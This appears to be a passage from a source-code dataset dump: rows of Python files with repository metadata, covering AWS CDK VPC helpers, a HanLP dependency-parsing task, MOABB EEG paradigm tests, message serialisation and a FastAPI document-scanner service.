None, vpc_subnet_type: Optional[ec2.SubnetType] = None, vpc_subnet_group_name: Optional[str] = None, ) -> Optional[ec2.SubnetSelection]: subnets: Optional[List[ec2.ISubnet]] = ( [ec2.Subnet.from_subnet_id(scope, f"{id}-{subnet_id}-sb", subnet_id) for subnet_id in vpc_subnet_ids] if vpc_subnet_ids else None ) return ( ec2.SubnetSelection( subnet_type=vpc_subnet_type, subnet_group_name=vpc_subnet_group_name, subnets=subnets, ) if vpc_subnet_type or vpc_subnet_group_name or subnets else None ) @staticmethod def _get_security_groups( scope: Construct, id: str, security_group_ids: Optional[List[str]] = None, ) -> Optional[List[ec2.ISecurityGroup]]: return ( [ ec2.SecurityGroup.from_security_group_id(scope, f"{id}-{security_group_id}-sg", security_group_id) for security_group_id in security_group_ids ] if security_group_ids else None ) @staticmethod def add_vpc_permissions(fn: lmb.IFunction) -> None: fn.add_to_role_policy( PolicyStatement( actions=[ "ec2:AssignPrivateIpAddresses", "ec2:CreateNetworkInterface", "ec2:DeleteNetworkInterface", "ec2:DescribeNetworkInterfaces", "ec2:UnassignPrivateIpAddresses", ], resources=["*"], ) )
2,112
0
131
f414007c79614bcaf6561ed9cfe13b9f48716da0
8,240
py
Python
hanlp/components/mtl/tasks/dep.py
antfootAlex/HanLP
e8044b27ae1de54b9070db08549853d3ca8271e2
[ "Apache-2.0" ]
3
2022-03-07T08:33:16.000Z
2022-03-07T08:38:08.000Z
hanlp/components/mtl/tasks/dep.py
hushaoyun/HanLP
967b52404c9d0adbc0cff2699690c127ecfca36e
[ "Apache-2.0" ]
null
null
null
hanlp/components/mtl/tasks/dep.py
hushaoyun/HanLP
967b52404c9d0adbc0cff2699690c127ecfca36e
[ "Apache-2.0" ]
null
null
null
# -*- coding:utf-8 -*- # Author: hankcs # Date: 2020-08-13 21:39 import logging from typing import Dict, Any, Union, Iterable, List import torch from torch.optim import Adam from torch.optim.lr_scheduler import ExponentialLR from torch.utils.data import DataLoader from hanlp.common.dataset import SamplerBuilder, PadSequenceDataLoader from hanlp.common.transform import VocabDict, TransformList from hanlp.components.mtl.tasks import Task from hanlp.components.parsers.biaffine.biaffine_dep import BiaffineDependencyParser from hanlp.components.parsers.biaffine.biaffine_model import BiaffineDecoder from hanlp.datasets.parsing.loaders.conll_dataset import append_bos from hanlp.layers.scalar_mix import ScalarMixWithDropoutBuilder from hanlp.metrics.metric import Metric from hanlp.metrics.mtl import MetricDict from hanlp.utils.time_util import CountdownTimer from hanlp_common.constant import EOS from hanlp_common.util import merge_locals_kwargs
49.047619
119
0.617597
# -*- coding:utf-8 -*- # Author: hankcs # Date: 2020-08-13 21:39 import logging from typing import Dict, Any, Union, Iterable, List import torch from torch.optim import Adam from torch.optim.lr_scheduler import ExponentialLR from torch.utils.data import DataLoader from hanlp.common.dataset import SamplerBuilder, PadSequenceDataLoader from hanlp.common.transform import VocabDict, TransformList from hanlp.components.mtl.tasks import Task from hanlp.components.parsers.biaffine.biaffine_dep import BiaffineDependencyParser from hanlp.components.parsers.biaffine.biaffine_model import BiaffineDecoder from hanlp.datasets.parsing.loaders.conll_dataset import append_bos from hanlp.layers.scalar_mix import ScalarMixWithDropoutBuilder from hanlp.metrics.metric import Metric from hanlp.metrics.mtl import MetricDict from hanlp.utils.time_util import CountdownTimer from hanlp_common.constant import EOS from hanlp_common.util import merge_locals_kwargs class BiaffineDependencyParsing(Task, BiaffineDependencyParser): def __init__(self, trn: str = None, dev: str = None, tst: str = None, sampler_builder: SamplerBuilder = None, dependencies: str = None, scalar_mix: ScalarMixWithDropoutBuilder = None, use_raw_hidden_states=False, lr=2e-3, separate_optimizer=False, cls_is_bos=True, sep_is_eos=False, punct=False, tree=False, proj=False, n_mlp_arc=500, n_mlp_rel=100, mlp_dropout=.33, mu=.9, nu=.9, epsilon=1e-12, decay=.75, decay_steps=5000, use_pos=False, max_seq_len=None, **kwargs) -> None: """Biaffine dependency parsing (:cite:`dozat:17a`). Args: trn: Path to training set. dev: Path to dev set. tst: Path to test set. sampler_builder: A builder which builds a sampler. dependencies: Its dependencies on other tasks. scalar_mix: A builder which builds a `ScalarMixWithDropout` object. use_raw_hidden_states: Whether to use raw hidden states from transformer without any pooling. lr: Learning rate for this task. separate_optimizer: Use customized separate optimizer for this task. cls_is_bos: ``True`` to treat the first token as ``BOS``. sep_is_eos: ``True`` to treat the last token as ``EOS``. punct: ``True`` to include punctuations in evaluation. tree: ``True`` to enforce tree constraint. proj: ``True`` for projective parsing. n_mlp_arc: Number of features for arc representation. n_mlp_rel: Number of features for rel representation. mlp_dropout: Dropout applied to MLPs. mu: First coefficient used for computing running averages of gradient and its square in Adam. nu: Second coefficient used for computing running averages of gradient and its square in Adam. epsilon: Term added to the denominator to improve numerical stability decay: Decay rate for exceptional lr scheduler. decay_steps: Decay every ``decay_steps`` steps. use_pos: Use pos feature. max_seq_len: Prune samples longer than this length. **kwargs: Not used. """ super().__init__(**merge_locals_kwargs(locals(), kwargs)) self.vocabs = VocabDict() def update_metrics(self, batch: Dict[str, Any], output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any], prediction: Dict[str, Any], metric: Union[MetricDict, Metric]): BiaffineDependencyParser.update_metric(self, *prediction, batch['arc'], batch['rel_id'], output[1], batch.get('punct_mask', None), metric, batch) def decode_output(self, output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any], mask: torch.BoolTensor, batch: Dict[str, Any], decoder, **kwargs) -> Union[Dict[str, Any], Any]: (arc_scores, rel_scores), mask = output return BiaffineDependencyParser.decode(self, arc_scores, rel_scores, mask, batch) def compute_loss(self, batch: Dict[str, Any], output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any], criterion) -> \ Union[torch.FloatTensor, Dict[str, torch.FloatTensor]]: (arc_scores, rel_scores), mask = output return BiaffineDependencyParser.compute_loss(self, arc_scores, rel_scores, batch['arc'], batch['rel_id'], mask, criterion, batch) def build_model(self, encoder_size, training=True, **kwargs) -> torch.nn.Module: return BiaffineDecoder(encoder_size, self.config.n_mlp_arc, self.config.n_mlp_rel, self.config.mlp_dropout, len(self.vocabs.rel)) def build_metric(self, **kwargs): return BiaffineDependencyParser.build_metric(self, **kwargs) def build_dataloader(self, data, transform: TransformList = None, training=False, device=None, logger: logging.Logger = None, gradient_accumulation=1, **kwargs) -> DataLoader: transform.insert(0, append_bos) dataset = BiaffineDependencyParser.build_dataset(self, data, transform) if isinstance(data, str): dataset.purge_cache() if self.vocabs.mutable: BiaffineDependencyParser.build_vocabs(self, dataset, logger, transformer=True) if dataset.cache: timer = CountdownTimer(len(dataset)) BiaffineDependencyParser.cache_dataset(self, dataset, timer, training, logger) max_seq_len = self.config.get('max_seq_len', None) if max_seq_len and isinstance(data, str): dataset.prune(lambda x: len(x['token_input_ids']) > 510, logger) return PadSequenceDataLoader( batch_sampler=self.sampler_builder.build(self.compute_lens(data, dataset, length_field='FORM'), shuffle=training, gradient_accumulation=gradient_accumulation), device=device, dataset=dataset, pad=self.get_pad_dict()) def feed_batch(self, h: torch.FloatTensor, batch: Dict[str, torch.Tensor], mask: torch.BoolTensor, decoder: torch.nn.Module): logits = super().feed_batch(h, batch, mask, decoder) mask = mask.clone() mask[:, 0] = 0 return logits, mask def build_optimizer(self, decoder: torch.nn.Module, **kwargs): config = self.config optimizer = Adam(decoder.parameters(), config.lr, (config.mu, config.nu), config.epsilon) scheduler = ExponentialLR(optimizer, config.decay ** (1 / config.decay_steps)) return optimizer, scheduler def input_is_flat(self, data) -> bool: return BiaffineDependencyParser.input_is_flat(self, data, self.config.use_pos) def prediction_to_result(self, prediction: Dict[str, Any], batch: Dict[str, Any]) -> List: arcs, rels = prediction arcs = arcs[:, 1:] # Skip the ROOT rels = rels[:, 1:] arcs = arcs.tolist() rels = rels.tolist() vocab = self.vocabs['rel'].idx_to_token for arcs_per_sent, rels_per_sent, tokens in zip(arcs, rels, batch['token']): tokens = tokens[1:] sent_len = len(tokens) result = list(zip(arcs_per_sent[:sent_len], [vocab[r] for r in rels_per_sent[:sent_len]])) yield result def build_samples(self, inputs, cls_is_bos=False, sep_is_eos=False): return [{'FORM': token + ([EOS] if sep_is_eos else [])} for token in inputs]
4,262
3,001
23
cf676ab96dacbd16b460fdb6d7e34436bac6a565
419
py
Python
pySOT/__init__.py
WY-Wang/pySOT
a2de59a0ab00da0465b964e070199fe4773918cd
[ "BSD-3-Clause" ]
180
2015-11-17T03:36:31.000Z
2022-03-16T10:09:42.000Z
pySOT/__init__.py
WY-Wang/pySOT
a2de59a0ab00da0465b964e070199fe4773918cd
[ "BSD-3-Clause" ]
41
2015-06-30T15:43:10.000Z
2021-02-04T06:03:02.000Z
pySOT/__init__.py
WY-Wang/pySOT
a2de59a0ab00da0465b964e070199fe4773918cd
[ "BSD-3-Clause" ]
45
2015-10-29T16:40:11.000Z
2021-11-14T01:44:39.000Z
#!/usr/bin/env python3 from . import auxiliary_problems, controller, experimental_design, optimization_problems, strategy, surrogate __version__ = "0.3.3" __author__ = "David Eriksson, David Bindel, Christine Shoemaker" __all__ = [ "auxiliary_problems", "controller", "experimental_design", "optimization_problems", "strategy", "surrogate", # Other "__author__", "__version__", ]
22.052632
109
0.704057
#!/usr/bin/env python3 from . import auxiliary_problems, controller, experimental_design, optimization_problems, strategy, surrogate __version__ = "0.3.3" __author__ = "David Eriksson, David Bindel, Christine Shoemaker" __all__ = [ "auxiliary_problems", "controller", "experimental_design", "optimization_problems", "strategy", "surrogate", # Other "__author__", "__version__", ]
0
0
0
6d2cdfac699b5c92a28578e4397e7d6a16af2a88
2,799
py
Python
message_body.py
juhyun0/python_network
fe730a6b405d80b910fe18e082b5bf1d85cba0dd
[ "Unlicense" ]
null
null
null
message_body.py
juhyun0/python_network
fe730a6b405d80b910fe18e082b5bf1d85cba0dd
[ "Unlicense" ]
null
null
null
message_body.py
juhyun0/python_network
fe730a6b405d80b910fe18e082b5bf1d85cba0dd
[ "Unlicense" ]
null
null
null
from message import ISerializable import message import struct
23.923077
84
0.540907
from message import ISerializable import message import struct class BodyRequest(ISerializable): def __init__(self, buffer): if buffer != None: slen = len(buffer) self.struct_fmt = str.format('=Q{0}s', slen - 8) self.struct_len = struct.calcsize(self.struct_fmt) if slen > 4: slen = slen - 4 else: slen = 0 unpacked = struct.unpack(self.struct_fmt, buffer) self.FILESIZE = unpacked[0] self.FILENAME = unpacked[1].decode(encoding='utf-8').replace('\x00', '') else: self.struct_fmt = str.format('=Q{0}s', 0) self.struct_len = struct.calcsize(self.struct_fmt) self.FILESIZE = 0 self.FILENAME = '' def GetBytes(self): buffer = self.FILENAME.encode(encoding='utf-8') self.struct_fmt = str.format('=Q{0}s', len(buffer)) return struct.pack( self.struct_fmt, *( self.FILESIZE, buffer )) def GetSize(self): buffer = self.FILENAME.encode(encoding='utf-8') self.struct_fmt = str.format('=Q{0}s', len(buffer)) self.struct_len = struct.calcsize(self.struct_fmt) return self.struct_len class BodyResponse(ISerializable): def __init__(self, buffer): self.struct_fmt = 'IB' self.struct_len = struct.calcsize(self.struct_fmt) if buffer != None: unpacked = struct.unpack(self.struct_fmt, buffer) self.MSGID = unpacked[0] self.RESPONSE = unpacked[1] else: self.MSGID = 0 self.RESPONSE = message.DENIED def GetBytes(self): return struct.pack( self.struct_fmt, *( self.MSGID, self.RESPONSE )) def GetSize(self): return self.struct_len class BodyData(ISerializable): def __init__(self, buffer): if buffer != None: self.DATA = buffer def GetBytes(self): return self.DATA def GetSize(self): return len(self.DATA) class BodyResult(ISerializable): def __init__(self, buffer): self.struct_fmt = '=IB' self.struct_len = struct.calcsize(self.struct_fmt) if buffer: unpacked = struct.unpack(self.struct_fmt, buffer) self.MSGID = unpacked[0] self.RESULT = unpacked[1] else: self.MSGID = 0 self.RESULT = message.FAIL def GetBytes(self): return struct.pack( self.struct_fmt, *( self.MSGID, self.RESULT )) def GetSize(self): return self.struct_len
2,272
45
414
0ae4e1aacab37222a89735b99e10a43c842bb161
17,586
py
Python
moabb/tests/paradigms.py
plcrodrigues/moabb
aa4274fe7905631864e854c121c92e1927061f29
[ "BSD-3-Clause" ]
321
2017-06-03T16:14:45.000Z
2022-03-28T17:43:59.000Z
moabb/tests/paradigms.py
plcrodrigues/moabb
aa4274fe7905631864e854c121c92e1927061f29
[ "BSD-3-Clause" ]
223
2017-06-03T17:41:57.000Z
2022-03-29T09:07:44.000Z
moabb/tests/paradigms.py
girafe-ai/moabb
78bbb48a2a0058b0725ebeba1ba1e3203f0eacd5
[ "BSD-3-Clause" ]
118
2017-06-03T18:36:35.000Z
2022-03-16T06:22:02.000Z
import logging import unittest import numpy as np from mne import BaseEpochs from moabb.datasets.fake import FakeDataset from moabb.paradigms import ( P300, SSVEP, BaseMotorImagery, BaseP300, BaseSSVEP, FilterBankLeftRightImagery, FilterBankMotorImagery, FilterBankSSVEP, LeftRightImagery, ) log = logging.getLogger(__name__) log.setLevel(logging.ERROR)
43.315271
89
0.65501
import logging import unittest import numpy as np from mne import BaseEpochs from moabb.datasets.fake import FakeDataset from moabb.paradigms import ( P300, SSVEP, BaseMotorImagery, BaseP300, BaseSSVEP, FilterBankLeftRightImagery, FilterBankMotorImagery, FilterBankSSVEP, LeftRightImagery, ) log = logging.getLogger(__name__) log.setLevel(logging.ERROR) class SimpleMotorImagery(BaseMotorImagery): # Needed to assess BaseImagery def used_events(self, dataset): return dataset.event_id class Test_MotorImagery(unittest.TestCase): def test_BaseImagery_paradigm(self): paradigm = SimpleMotorImagery() dataset = FakeDataset(paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # we should have all the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D Array self.assertEqual(len(X.shape), 3) # labels must contain 3 values self.assertEqual(len(np.unique(labels)), 3) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # we should have only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # we should have two sessions in the metadata self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseImagery_channel_order(self): """test if paradigm return correct channel order, see issue #227""" datasetA = FakeDataset(paradigm="imagery", channels=["C3", "Cz", "C4"]) datasetB = FakeDataset(paradigm="imagery", channels=["Cz", "C4", "C3"]) paradigm = SimpleMotorImagery(channels=["C4", "C3", "Cz"]) ep1, _, _ = paradigm.get_data(datasetA, subjects=[1], return_epochs=True) ep2, _, _ = paradigm.get_data(datasetB, subjects=[1], return_epochs=True) self.assertEqual(ep1.info["ch_names"], ep2.info["ch_names"]) def test_BaseImagery_tmintmax(self): self.assertRaises(ValueError, SimpleMotorImagery, tmin=1, tmax=0) def test_BaseImagery_filters(self): # can work with filter bank paradigm = SimpleMotorImagery(filters=[[7, 12], [12, 24]]) dataset = FakeDataset(paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_baseImagery_wrongevent(self): # test process_raw return empty list if raw does not contain any # selected event. cetain runs in dataset are event specific. paradigm = SimpleMotorImagery(filters=[[7, 12], [12, 24]]) dataset = FakeDataset(paradigm="imagery") raw = dataset.get_data([1])[1]["session_0"]["run_0"] # add something on the event channel raw._data[-1] *= 10 self.assertIsNone(paradigm.process_raw(raw, dataset)) # zeros it out raw._data[-1] *= 0 self.assertIsNone(paradigm.process_raw(raw, dataset)) def test_BaseImagery_noevent(self): # Assert error if events from paradigm and dataset dont overlap paradigm = SimpleMotorImagery(events=["left_hand", "right_hand"]) dataset = FakeDataset(paradigm="imagery") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_LeftRightImagery_paradigm(self): # with a good dataset paradigm = LeftRightImagery() dataset = FakeDataset(event_list=["left_hand", "right_hand"], paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) self.assertEqual(len(np.unique(labels)), 2) self.assertEqual(list(np.unique(labels)), ["left_hand", "right_hand"]) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_LeftRightImagery_noevent(self): # we cant pass event to this class self.assertRaises(ValueError, LeftRightImagery, events=["a"]) def test_LeftRightImagery_badevents(self): paradigm = LeftRightImagery() # does not accept dataset with bad event dataset = FakeDataset(paradigm="imagery") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_FilterBankMotorImagery_paradigm(self): # can work with filter bank paradigm = FilterBankMotorImagery() dataset = FakeDataset(paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 6) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_FilterBankMotorImagery_moreclassesthanevent(self): self.assertRaises( AssertionError, FilterBankMotorImagery, n_classes=3, events=["hands", "feet"] ) def test_FilterBankLeftRightImagery_paradigm(self): # can work with filter bank paradigm = FilterBankLeftRightImagery() dataset = FakeDataset(event_list=["left_hand", "right_hand"], paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 6) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) class SimpleP300(BaseP300): # Needed to assess BaseP300 def used_events(self, dataset): return dataset.event_id class Test_P300(unittest.TestCase): def test_BaseP300_paradigm(self): paradigm = SimpleP300() dataset = FakeDataset(paradigm="p300", event_list=["Target", "NonTarget"]) X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # we should have all the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D Array self.assertEqual(len(X.shape), 3) # labels must contain 2 values (Target/NonTarget) self.assertEqual(len(np.unique(labels)), 2) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # we should have only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # we should have two sessions in the metadata self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseP300_channel_order(self): """test if paradigm return correct channel order, see issue #227""" datasetA = FakeDataset( paradigm="p300", channels=["C3", "Cz", "C4"], event_list=["Target", "NonTarget"], ) datasetB = FakeDataset( paradigm="p300", channels=["Cz", "C4", "C3"], event_list=["Target", "NonTarget"], ) paradigm = SimpleP300(channels=["C4", "C3", "Cz"]) ep1, _, _ = paradigm.get_data(datasetA, subjects=[1], return_epochs=True) ep2, _, _ = paradigm.get_data(datasetB, subjects=[1], return_epochs=True) self.assertEqual(ep1.info["ch_names"], ep2.info["ch_names"]) def test_BaseP300_tmintmax(self): self.assertRaises(ValueError, SimpleP300, tmin=1, tmax=0) def test_BaseP300_filters(self): # can work with filter bank paradigm = SimpleP300(filters=[[1, 12], [12, 24]]) dataset = FakeDataset(paradigm="p300", event_list=["Target", "NonTarget"]) X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseP300_wrongevent(self): # test process_raw return empty list if raw does not contain any # selected event. cetain runs in dataset are event specific. paradigm = SimpleP300(filters=[[1, 12], [12, 24]]) dataset = FakeDataset(paradigm="p300", event_list=["Target", "NonTarget"]) raw = dataset.get_data([1])[1]["session_0"]["run_0"] # add something on the event channel raw._data[-1] *= 10 self.assertIsNone(paradigm.process_raw(raw, dataset)) # zeros it out raw._data[-1] *= 0 self.assertIsNone(paradigm.process_raw(raw, dataset)) def test_P300_specifyevent(self): # we cant pass event to this class self.assertRaises(ValueError, P300, events=["a"]) def test_P300_wrongevent(self): # does not accept dataset with bad event paradigm = P300() dataset = FakeDataset(paradigm="p300") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_P300_paradigm(self): # with a good dataset paradigm = P300() dataset = FakeDataset(event_list=["Target", "NonTarget"], paradigm="p300") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) self.assertEqual(len(np.unique(labels)), 2) self.assertEqual(list(np.unique(labels)), sorted(["Target", "NonTarget"])) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) class Test_SSVEP(unittest.TestCase): def test_BaseSSVEP_paradigm(self): paradigm = BaseSSVEP(n_classes=None) dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # Verify that they have the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D array self.assertEqual(len(X.shape), 3) # labels must contain 3 values self.assertEqual(len(np.unique(labels)), 3) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # Only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # we should have two sessions in the metadata, n_classes = 2 as default self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseSSVEP_channel_order(self): """test if paradigm return correct channel order, see issue #227""" datasetA = FakeDataset(paradigm="ssvep", channels=["C3", "Cz", "C4"]) datasetB = FakeDataset(paradigm="ssvep", channels=["Cz", "C4", "C3"]) paradigm = BaseSSVEP(channels=["C4", "C3", "Cz"]) ep1, _, _ = paradigm.get_data(datasetA, subjects=[1], return_epochs=True) ep2, _, _ = paradigm.get_data(datasetB, subjects=[1], return_epochs=True) self.assertEqual(ep1.info["ch_names"], ep2.info["ch_names"]) def test_baseSSVEP_tmintmax(self): # Verify that tmin < tmax self.assertRaises(ValueError, BaseSSVEP, tmin=1, tmax=0) def test_BaseSSVEP_filters(self): # Accept filters paradigm = BaseSSVEP(filters=[(10.5, 11.5), (12.5, 13.5)]) dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D array self.assertEqual(len(X.shape), 4) # Last dim should be 2 as the number of filters self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseSSVEP_nclasses_default(self): # Default is with 3 classes paradigm = BaseSSVEP() dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # labels must contain all 3 classes of dataset, # as n_classes is "None" by default (taking all classes) self.assertEqual(len(np.unique(labels)), 3) def test_BaseSSVEP_specified_nclasses(self): # Set the number of classes paradigm = BaseSSVEP(n_classes=3) dataset = FakeDataset(event_list=["13", "15", "17", "19"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # labels must contain 3 values self.assertEqual(len(np.unique(labels)), 3) def test_BaseSSVEP_toomany_nclasses(self): paradigm = BaseSSVEP(n_classes=4) dataset = FakeDataset(event_list=["13", "15"], paradigm="ssvep") self.assertRaises(ValueError, paradigm.get_data, dataset) def test_BaseSSVEP_moreclassesthanevent(self): self.assertRaises(AssertionError, BaseSSVEP, n_classes=3, events=["13.", "14."]) def test_SSVEP_noevent(self): # Assert error if events from paradigm and dataset dont overlap paradigm = SSVEP(events=["11", "12"], n_classes=2) dataset = FakeDataset(event_list=["13", "14"], paradigm="ssvep") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_SSVEP_paradigm(self): paradigm = SSVEP(n_classes=None) dataset = FakeDataset(event_list=["13", "15", "17", "19"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # Verify that they have the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D array self.assertEqual(len(X.shape), 3) # labels must contain 4 values, defined in the dataset self.assertEqual(len(np.unique(labels)), 4) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # Only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # We should have two sessions in the metadata self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_SSVEP_singlepass(self): # Accept only single pass filter paradigm = SSVEP(fmin=2, fmax=25) dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # Verify that they have the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D array self.assertEqual(len(X.shape), 3) # labels must contain all 3 classes of dataset, # as n_classes is "None" by default (taking all classes) self.assertEqual(len(np.unique(labels)), 3) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_SSVEP_filter(self): # Do not accept multiple filters self.assertRaises(ValueError, SSVEP, filters=[(10.5, 11.5), (12.5, 13.5)]) def test_FilterBankSSVEP_paradigm(self): # FilterBankSSVEP with all events paradigm = FilterBankSSVEP(n_classes=None) dataset = FakeDataset(event_list=["13", "15", "17", "19"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D array self.assertEqual(len(X.shape), 4) # X must be a 4D array with d=4 as last dimension for the 4 events self.assertEqual(X.shape[-1], 4) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_FilterBankSSVEP_filters(self): # can work with filter bank paradigm = FilterBankSSVEP(filters=[(10.5, 11.5), (12.5, 13.5)]) dataset = FakeDataset(event_list=["13", "15", "17"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D array with d=2 as last dimension for the 2 filters self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs)
14,160
2,860
167
6c54ad6eb0c9dcb90c8b78eed507fc7172e160ae
5,067
py
Python
lib_photo_scanner/api.py
Techainer/lib_photo_scanner
58f7efa5e5b9630bc063d614bfbfde904bfa4f00
[ "MIT" ]
null
null
null
lib_photo_scanner/api.py
Techainer/lib_photo_scanner
58f7efa5e5b9630bc063d614bfbfde904bfa4f00
[ "MIT" ]
null
null
null
lib_photo_scanner/api.py
Techainer/lib_photo_scanner
58f7efa5e5b9630bc063d614bfbfde904bfa4f00
[ "MIT" ]
null
null
null
from __future__ import absolute_import from fastapi import FastAPI, HTTPException, Depends, Request, status from fastapi.responses import JSONResponse from pydantic import BaseModel import time import os from lib import Scanner, logger import traceback from typing import Optional import sys app = FastAPI() ls, scanners, scanners_set, scanner_name = get_scanner() print(ls, scanners, scanners_set, scanner_name) lock = False last_lock = time.time() LOCK_THRESHOLD = int(os.environ.get('LOCK_THRESHOLD', None)) if os.environ.get('LOCK_THRESHOLD', None) is not None else 3 @app.route('/') @app.route('/list') @app.route('/scan')
31.867925
121
0.586738
from __future__ import absolute_import from fastapi import FastAPI, HTTPException, Depends, Request, status from fastapi.responses import JSONResponse from pydantic import BaseModel import time import os from lib import Scanner, logger import traceback from typing import Optional import sys app = FastAPI() def get_scanner(scanner_name: str = None): ls = Scanner() scanners = ls.getScanners() if scanner_name is None: if scanners is None or len(scanners) == 0: return None, [], {}, None scanner_name = scanners[0] if isinstance(scanner_name, tuple) or isinstance(scanner_name, list): scanner_name = scanner_name[0] try: ls.setScanner(scanner_name) ls.setDPI(300) ls.setPixelType("color") if sys.platform == "win32": ls.close() except Exception as ex: logger.error('Can not set Scanner: {0}'.format(ex)) print('Can not set Scanner: {0}'.format(ex)) return None, scanners, set(scanners), None return ls, scanners, set(scanners), scanner_name ls, scanners, scanners_set, scanner_name = get_scanner() print(ls, scanners, scanners_set, scanner_name) lock = False last_lock = time.time() LOCK_THRESHOLD = int(os.environ.get('LOCK_THRESHOLD', None)) if os.environ.get('LOCK_THRESHOLD', None) is not None else 3 @app.route('/') def ping(request): start_time = time.time() output = { "output": "pong", "code": "SUCCESS", "msg": "SUCCESS", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_200_OK, content=output) @app.route('/list') def list_scanners(request): start_time = time.time() global scanners output = { "output": scanners, "code": "SUCCESS", "msg": "SUCCESS", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_200_OK, content=output) @app.route('/scan') def scanning(request, request_id: Optional[str] = None, scanner_name: Optional[str] = None): start_time = time.time() global ls global lock global scanners global scanners_set global last_lock if lock: if last_lock + LOCK_THRESHOLD < time.time(): lock = False else: output = { "request_id": request_id, "output": False, "code": "LOCK", "msg": "The scanner is locking, please wait", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_423_LOCKED, content=output) if scanner_name is not None: if scanner_name not in scanners_set: ls, scanners, scanners_set, scanner_name = get_scanner() if scanner_name not in scanners_set: output = { "request_id": request_id, "output": scanners, "code": "NOT_FOUND", "msg": "Not found scanner {0}".format(scanner_name), "time": time.time() - start_time } return 